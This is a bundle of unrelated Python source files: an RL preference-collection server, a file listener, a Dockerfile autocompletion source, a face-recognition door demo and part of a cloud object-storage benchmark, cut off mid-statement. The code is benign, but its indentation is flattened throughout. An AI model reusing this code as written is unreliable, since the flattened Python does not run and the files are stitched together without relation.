# Extract the subsequence.
this_states, this_observations, this_actions = [], [], []
for i in range(max_idx):
data.popleft()
for i in range(self._video_length):
d = data.popleft()
this_states.append(d[0])
this_observations.append(d[1])
this_actions.append(d[2])
# Convert the output to ndarrays.
this_states, this_observations, this_actions = map(np.array, (this_states, this_observations, this_actions))
self._try_post_pair(this_states, this_observations, this_actions, max_sum)
def _try_post_pair(self, states, observations, actions, variance):
# Non-thread-safe operation: acquire the lock.
with self._pair_mutex:
self._pair_buffer.append((states, observations, actions, variance))
if len(self._pair_buffer) == 2:
t1, t2 = self._pair_buffer
self._pool.push(t1[0], t1[1], t1[2], t2[0], t2[1], t2[2], t1[3] + t2[3])
self._pair_buffer.clear()
def __restore_preferences(self):
"""Restore the preferences we already have."""
dirname = osp.join(get_env('dir.root'), 'trajectories')
if not osp.isdir(dirname):
return
all_data = []
logger.critical('Restoring preference')
for uid in os.listdir(dirname):
item = osp.join(dirname, uid)
pref_filename = osp.join(item, 'pref.txt')
pair_filename = osp.join(item, 'pair.pkl')
if osp.exists(pref_filename) and osp.exists(pair_filename):
pref = float(io.load(pref_filename)[0])
pair = io.load(pair_filename)
data = TrainingData(pair.t1_state, pair.t1_action, pair.t2_state, pair.t2_action, pref)
all_data.append(data)
if len(all_data) > 0:
self._rpredictor.extend_training_data(all_data)
logger.critical('Preference restore finished: success={}'.format(len(all_data)))
class TrajectoryPairPool(object):
"""
    Trajectory pair pool is a simple pool containing a set of trajectory pairs. In this implementation, we maintain a
    priority queue of a given max size. When a new trajectory pair comes in, we push it into the priority queue and
    pop out the one with the lowest priority.
    When the pop() method is called, the trajectory pair with the highest priority is popped out. The pool generates
    the demonstration files (e.g. GIF animations) and returns a UID and the pair.
    See the _process method for details of the dump.
"""
def __init__(self, maxlen=100, tformat='GIF'):
"""
Initialize an empty trajectory pair pool.
:param maxlen: max size of the pool.
:param tformat: trajectory format, default "GIF".
"""
self._data_pool = sortedcollections.SortedList()
self._data_pool_counter = itertools.count()
self._data_pool_lock = threading.Lock()
self._maxlen = maxlen
self._tformat = tformat
def push(self, t1_state, t1_observation, t1_action, t2_state, t2_observation, t2_action, priority):
with self._data_pool_lock:
wrapped = _TrajectoryPairWrapper(priority=priority, count=next(self._data_pool_counter),
pair=TrajectoryPair(
t1_state, t1_observation, t1_action,
t2_state, t2_observation, t2_action))
self._data_pool.add(wrapped)
            if len(self._data_pool) > self._maxlen:  # keep at most maxlen pairs; drop the lowest-priority one
self._data_pool.pop(0)
def pop(self):
with self._data_pool_lock:
if len(self._data_pool) == 0:
return None, None
return self._process(self._data_pool.pop().pair)
def _process(self, pair):
uid = uuid.uuid4().hex
dirname = _compose_dir(uid)
io.mkdir(dirname)
# dump the file for displaying
if self._tformat == 'GIF':
_save_gif(pair.t1_observation, osp.join(dirname, '1.gif'))
_save_gif(pair.t2_observation, osp.join(dirname, '2.gif'))
else:
raise ValueError('Unknown trajectory format: {}'.format(self._tformat))
# cleanup
pair = TrajectoryPair(pair.t1_state, None, pair.t1_action, pair.t2_state, None, pair.t2_action)
# dump the raw pair
io.dump(osp.join(dirname, 'pair.pkl'), pair)
return uid, pair
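# Usage sketch (assumed): pairs are pushed with a priority (e.g. the summed variance) and
# popped highest-priority-first; pop() dumps the GIFs for labeling and returns (uid, pair),
# or (None, None) when the pool is empty.
#   pool = TrajectoryPairPool(maxlen=100)
#   pool.push(t1_s, t1_o, t1_a, t2_s, t2_o, t2_a, priority=variance_sum)
#   uid, pair = pool.pop()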
class WebServer(object):
def __init__(self, collector, configs):
from .pcollector_web_handlers import MainHandler, GetHandler, SubmitHandler
self._template_loader = template.Loader(osp.join(osp.dirname(__file__), '_tpl'))
self._configs = configs
init_kwargs = dict(collector=collector, loader=self._template_loader, configs=configs)
self._application = Application([
(r'/', MainHandler, init_kwargs),
(r'/get', GetHandler, init_kwargs),
(r'/submit', SubmitHandler, init_kwargs),
(r'/trajectories/(.*)', StaticFileHandler, {'path': osp.join(get_env('dir.root'), 'trajectories')})
], debug=True)
@property
def application(self):
return self._application
@property
def port(self):
return self._configs['port']
def mainloop(self):
logger.critical('Opening web server at: http://{}:{} .'.format(get_local_addr(), self.port))
self._application.listen(self.port)
ioloop.IOLoop.current().start()
|
file_listener.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
from __future__ import absolute_import
import os
import time
from threading import Thread
# ============= local library imports ==========================
class FileListener(object):
_path = None
_callback = None
_check_callback = None
_alive = False
_freq = None
def __init__(self, path, callback=None, check=None, freq=1):
"""
        two methods for checking whether the file has changed:
        1. check=None
            the file has changed if its modified time differs from the original modified time
        2. check=callable
            use a callable to compare files,
            e.g. experiment_set uses check_for_mods, which compares the SHA digests of the file contents
        freq: polling frequency in hertz; sleep period = 1 / freq
        remember to call stop() to stop checking the file for changes
"""
self._path = path
self._callback = callback
self._check_callback = check
self._freq = freq
self._alive = True
if os.path.isfile(self._path):
t = Thread(target=self._listen)
t.start()
@property
def otime(self):
return os.stat(self._path).st_mtime
def stop(self):
self._alive = False
def _listen(self):
self._otime = self.otime
while self._alive:
time.sleep(1 / self._freq)
if self._check():
self._callback()
self._otime = self.otime
def _check(self):
if self._check_callback:
return self._check_callback()
else:
return self.otime != self._otime
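# Usage sketch (assumed): watch a file and print a message whenever its mtime changes.
# The path below is hypothetical; with check=None the default mtime comparison is used.
if __name__ == '__main__':
    def _on_change():
        print('file changed')
    listener = FileListener('/tmp/watched_file.txt', callback=_on_change, freq=2)
    try:
        time.sleep(10)
    finally:
        listener.stop()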
# ============= EOF =============================================
|
docker.py
|
# Copyright 2016 Koichi Shiraishi. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import re
import threading
from .base import Base
from deoplete.util import load_external_module
load_external_module(__file__, 'urllib3')
load_external_module(__file__, 'dockerhub')
from dockerhub.dockerhub import DockerHub
KEYWORD = [
'ADD', 'ARG', 'CMD', 'COPY', 'ENTRYPOINT', 'ENV', 'EXPOSE', 'FROM',
'HEALTHCHECK', 'LABEL', 'MAINTAINER', 'RUN', 'SHELL', 'STOPSIGNAL', 'USER',
'VOLUME', 'WORKDIR'
]
class Source(Base):
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'docker'
self.mark = '[Docker]'
self.filetypes = ['dockerfile']
        self.input_pattern = r'[a-zA-Z_]\w*[:/]\w*|' + \
            r'^\s*(?:' + '|'.join(KEYWORD) + r')\s+(?:[\w\.]*(?:,\s*)?)*'
self.rank = 500
self.debug_enabled = 1
self.hub = DockerHub()
self.cache_images = dict()
self.cache_tags = dict()
self.keyword_result = [{'word': x} for x in KEYWORD]
def init(self, context):
try:
images = self.hub.search('library')
except Exception:
pass
else:
self.cache_images['library'] = []
for i in images:
self.cache_images['library'].append({
'word': i['name'],
'kind': i['description'],
'dup': 1,
})
def on_init(self, context):
th = threading.Thread(target=self.init, name='init', args=(context, ))
th.start()
def get_complete_position(self, context):
m = re.search(r'\w*$', context['input'])
return m.start() if m else -1
def gather_candidates(self, context):
input_text = context['input']
if 'FROM' in input_text:
return self.result_from(context['input'])
elif 'ONBUILD' in input_text:
return self.keyword_result
else:
return self.keyword_result + [{'word': 'ONBUILD'}]
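    # Example (sketch): typing 'FROM python:' reaches result_from('FROM python:'), which
    # looks up tag candidates for the 'python' image on Docker Hub (cached per image name).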
def result_from(self, input_text):
        # str.strip('FROM ') strips a set of characters, not the prefix; split off the keyword instead.
        t = input_text.split('FROM', 1)[-1].strip()
if t:
if t.find(':') != -1:
name = t.split(':')[0]
if self.cache_tags.get(name):
return self.cache_tags[name]
else:
tags = self.hub.tags(name)
out = []
for i in tags:
out.append({
'word': i['name'],
'dup': 1,
})
self.cache_tags[name] = out
return out
elif t.find('/') != -1:
user = t.split('/')[0]
if self.cache_images.get(user):
return self.cache_images[user]
else:
images = self.hub.search(user)
out = []
for i in images:
out.append({
'word': i['name'],
'kind': i['description'],
'dup': 1,
})
self.cache_images[user] = out
return self.cache_images[user]
else:
return self.cache_images['library']
|
timed_face_recognition.py
|
import cv2
import numpy as np
import time, threading
import pandas as pd
def face_recognition(names):
door_closed = cv2.imread("door_1.png")
door_open = cv2.imread("door_14.png")
resized_door_closed = cv2.resize(door_closed,None,fx=0.5,fy=0.5)
resized_door_open = cv2.resize(door_open,None,fx=0.5,fy=0.5)
print("You have 15 seconds time to scan your face")
def timer():
        time_limit = 17  # seconds allowed to scan your face and get inside
while time_limit >= 0:
m, s = divmod(time_limit, 60)
h, m = divmod(m, 60)
time.sleep(1)
time_limit -= 1
if stop_thread:
break
if time_limit == -1:
print("Sorry scanning time limit reached")
else:
print("Scanning Interrupted")
video_capture.release()
cv2.destroyAllWindows()
stop_thread = False
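    # `stop_thread` is read inside timer() via its closure; it is set to True after the
    # main loop exits so the countdown thread stops and can be joined.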
timer_thread = threading.Thread(target=timer)
timer_thread.start()
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read('Trainer/trainer.yml')
cascPathface = "haarcascade_frontalface_alt2.xml"
faceCascade = cv2.CascadeClassifier(cascPathface)
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
video_capture = cv2.VideoCapture(0, cv2.CAP_DSHOW) # TURNING VIDEO ON
blank = np.zeros((500, 1000, 3), dtype=np.uint8) # CREATING A BLANK IMAGE TO DISPLAY THE ERROR MESSAGE
    video_capture.set(3, 640)  # set video width
video_capture.set(4, 480) # set video height
# Define min window size to be recognized as a face
minW = 0.1 * video_capture.get(3)
minH = 0.1 * video_capture.get(4)
while video_capture.isOpened():
cv2.imshow("Door",resized_door_closed)
ret, frame = video_capture.read()
# IF CONDITION TO CHECK PROPER WORKING
if not ret:
print("Unable to open video")
break
        frame = cv2.flip(frame, 1)  # FLIPPING IT HORIZONTALLY (MIRROR VIEW)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # CONVERTING INTO GRAY SCALE
faces = faceCascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5, minSize=(int(minW), int(minH)),
flags=cv2.CASCADE_SCALE_IMAGE)
# IF MORE THAN 1 FACE IS DETECTED THEN STOP
if len(faces) > 1:
cv2.destroyWindow('Video')
cv2.putText(blank, "'Sorry' Stopped due to more faces", (0, 50), None, 1, (255, 255, 255), 2)
cv2.imshow('Error! Closed', blank)
if cv2.waitKey(0) & 0xFF == ord('q'):
break
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2) # CREATING RECTANGLE AROUND FACE
id, confidence = recognizer.predict(gray[y:y + h, x:x + w]) # PREDICTING USING TRAINED MODEL
            # If confidence is less than 100 ==> "0" : perfect match
if (confidence < 100):
id = names[id]
confidence = " {0}%".format(round(100 - confidence))
cv2.putText(frame, "Face Matched with the person", (50, 50), font, 1, (255, 255, 255), 2)
cv2.imshow("Door",resized_door_open)
# print("Face Matched with",id,",Door Opened")
else:
id = "Unknown"
confidence = " {0}%".format(round(100 - confidence))
cv2.putText(frame, "For Emergency SOS, Press 's'", (50, 50), font, 1, (255, 255, 255), 2)
# ADD SOS FUNCTION
cv2.putText(frame, str(id), (x + 5, y - 5), font, 1, (255, 255, 255), 2) # Displaying text "NAME"
cv2.putText(frame, str(confidence), (x + 5, y + h - 5), font, 1, (255, 255, 0),
1) # Displaying text "CONFIDENCE"
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
stop_thread = True
timer_thread.join()
if __name__ == '__main__':
df1 = pd.read_excel("Data_of_Employees.xlsx", engine='openpyxl')
names = ['None'] + df1['Name'].tolist()
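    # Label 0 from the trainer is assumed to be unused (hence the leading 'None'); the
    # recognizer's integer labels are assumed to index into `names` in spreadsheet order.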
face_recognition(names)
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access the storage provider.
For 1), we aim to simulate a typical use case of a common user of a storage
provider: uploading and downloading a set of files of different sizes to/from a
local directory.
For 2), we aim to measure the performance of a storage provider more directly
by accessing it via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import flags
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
                  'api_multistream_writes: runs API-based benchmarking with '
                  'multiple upload streams.\n'
                  'api_multistream_reads: runs API-based benchmarking with '
                  'multiple download streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted, and the list of object names will be written '
'to a file with the specified prefix in the following '
'format: <bucket>/<object>. This prefix can be passed to '
                    'this benchmark in a later run via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
                    'number of hours before (as specified by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
                    'If set, the worker threads\' output will be written to the '
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 100
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# upload or download the 100 test files sequentially, which makes each
# iteration take a very long time, so we run only 3 iterations.
CLI_TEST_ITERATION_COUNT_AZURE = 3
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Sometimes, even when a bucket is completely empty, the service provider will
# refuse to remove the bucket with a "BucketNotEmpty" error for up to 1 hour
# afterwards. We keep trying until we reach the one-hour limit. And this wait is
# necessary for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
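# Worked example (sketch): with num_vms=2 and threads_per_vm=10 the delay is
# 10.0 s (constant) + 5.0 s * 2 (per VM) + 0.1 s * 10 (per stream) = 21.0 s,
# i.e. MultiThreadStartDelay(2, 10).m_as('second') == 21.0.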
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
operation: 'upload' or 'download'. The operation the results are from.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = []
for start_time in start_times:
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes.append(i)
break
active_stop_indexes = []
for stop_time in stop_times:
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes.append(i + 1)
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval:
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
# we only divide by the time that stream was actually transmitting.
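  # Worked example (sketch): a stream that moved 1000 bytes during 4 s of summed operation
  # latency inside a 5 s active window contributes 1000 / 4 * 8 = 2000 bit/s to
  # 'net throughput' and 1000 / 5 * 8 = 1600 bit/s to the '(with gap)' variant.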
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
